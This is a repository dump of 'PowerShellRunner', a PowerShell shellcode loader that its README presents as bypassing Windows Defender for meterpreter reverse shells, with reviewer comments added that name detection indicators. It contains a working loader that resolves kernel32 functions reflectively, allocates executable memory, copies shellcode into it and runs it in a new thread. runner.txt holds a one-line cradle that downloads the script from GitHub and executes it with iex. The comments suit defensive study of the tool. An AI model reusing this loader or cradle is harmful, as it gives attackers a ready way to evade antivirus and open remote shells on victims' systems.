├── README.md ├── runner.ps1 └── runner.txt
/README.md:
--------------------------------------------------------------------------------
1 | # PowerShellRunner
2 |
3 | PowerShell script that utilizes WinAPI for bypassing Windows Defender implementation as of August 2, 2021. Using a msfvenom windows/x64/meterpreter/reverse_https ps1 shellcode will result in successful shell access. Shellcode should replace the placeholder in the script.
4 |
5 |
--------------------------------------------------------------------------------
/runner.ps1:
--------------------------------------------------------------------------------
# Reviewer notes (defender's reading): this script is an in-process shellcode
# loader. It resolves kernel32 exports through the P/Invoke wrappers that ship
# inside System.dll (Microsoft.Win32.UnsafeNativeMethods) rather than through a
# visible Add-Type/DllImport declaration, emits matching delegate types at
# runtime, allocates a private RWX region, copies a byte array into it and
# starts a thread at its base. The VirtualAlloc(PAGE_EXECUTE_READWRITE) ->
# Marshal.Copy -> CreateThread sequence and the thread start address lying in
# unbacked RWX memory of the PowerShell host are the indicators to alert on;
# PowerShell Script Block Logging (event 4104) and AMSI both observe this
# script text, including the literal type/assembly names below, at run time.
# potatoes: resolves the address of export $pineapple inside the already-loaded
# module $cherries by reflecting into System.dll's UnsafeNativeMethods and
# calling its GetModuleHandle / GetProcAddress wrappers.
#   $cherries  - module name passed to GetModuleHandle (kernel32.dll below)
#   $pineapple - export name passed to GetProcAddress
# Returns the IntPtr from GetProcAddress. A lookup failure yields zero; none of
# the callers below check for it.
1 | function potatoes {
2 | Param ($cherries, $pineapple)
# Selects the GAC-loaded assembly whose file name is System.dll and pulls the
# internal UnsafeNativeMethods type out of it. If no assembly matches, the
# pipeline yields $null and the .GetType call throws.
3 | $tomatoes = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4 | $turnips=@()
# Collects every GetProcAddress overload; the first one found is the one invoked.
5 | $tomatoes.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$turnips+=$_}}
6 | return $turnips[0].Invoke($null, @(($tomatoes.GetMethod('GetModuleHandle')).Invoke($null, @($cherries)), $pineapple))
7 | }
# apples: emits, in a dynamic in-memory assembly named 'ReflectedDelegate', a
# delegate type 'MyDelegateType' whose Invoke takes the parameter types $func
# and returns $delType, so that Marshal.GetDelegateForFunctionPointer can wrap
# a raw function pointer with that signature.
#   $func    - parameter types of the unmanaged function (positional, required)
#   $delType - return type; defaults to [Void]
# Returns the created delegate [Type].
8 | function apples {
9 | Param (
10 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
11 | [Parameter(Position = 1)] [Type] $delType = [Void]
12 | )
# Assembly is created with AssemblyBuilderAccess::Run only, so nothing is
# written to disk; the delegate type derives from System.MulticastDelegate.
13 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
# Constructor and Invoke are marked 'Runtime, Managed': the CLR supplies their
# bodies, which is what makes the type a usable delegate.
14 | $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
15 | $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
16 | return $type.CreateType()
17 | }
# VirtualAlloc(NULL, 0x1000, 0x3000, 0x40): 0x3000 is MEM_COMMIT|MEM_RESERVE and
# 0x40 is PAGE_EXECUTE_READWRITE. A fresh RWX private allocation in the
# PowerShell host process is the memory-scan signal defenders key on.
18 | $cucumbers =
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((potatoes kernel32.dll VirtualAlloc), (apples @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
# Placeholder for the byte array; published empty (see README).
19 | [Byte[]] $buf =
# Copies the whole buffer into the RWX region allocated above.
20 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $cucumbers, $buf.length)
# CreateThread(NULL, 0, $cucumbers, NULL, 0, NULL): a new thread whose start
# address is the allocated buffer, i.e. not backed by any module on disk. The
# returned handle is kept in $parsnips.
21 | $parsnips =
22 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((potatoes kernel32.dll CreateThread), (apples @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$cucumbers,[IntPtr]::Zero,0,[IntPtr]::Zero)
# WaitForSingleObject(handle, 0xFFFFFFFF): 0xFFFFFFFF is INFINITE, so the host
# process blocks until that thread exits. The delegate declares the timeout
# parameter as [Int32]; PowerShell converts the literal at call time.
23 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((potatoes kernel32.dll WaitForSingleObject), (apples @([IntPtr], [Int32]) ([Int]))).Invoke($parsnips, 0xFFFFFFFF)
24 |
--------------------------------------------------------------------------------
/runner.txt:
--------------------------------------------------------------------------------
# Download-and-execute cradle: fetches runner.ps1 over HTTPS from GitHub and
# hands the text straight to Invoke-Expression. From a detection standpoint the
# signals are a PowerShell process making an outbound request to
# raw.githubusercontent.com followed by iex of remote content; script block
# logging records the downloaded script body when it executes.
1 | iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellRunner/main/runner.ps1')
2 |
--------------------------------------------------------------------------------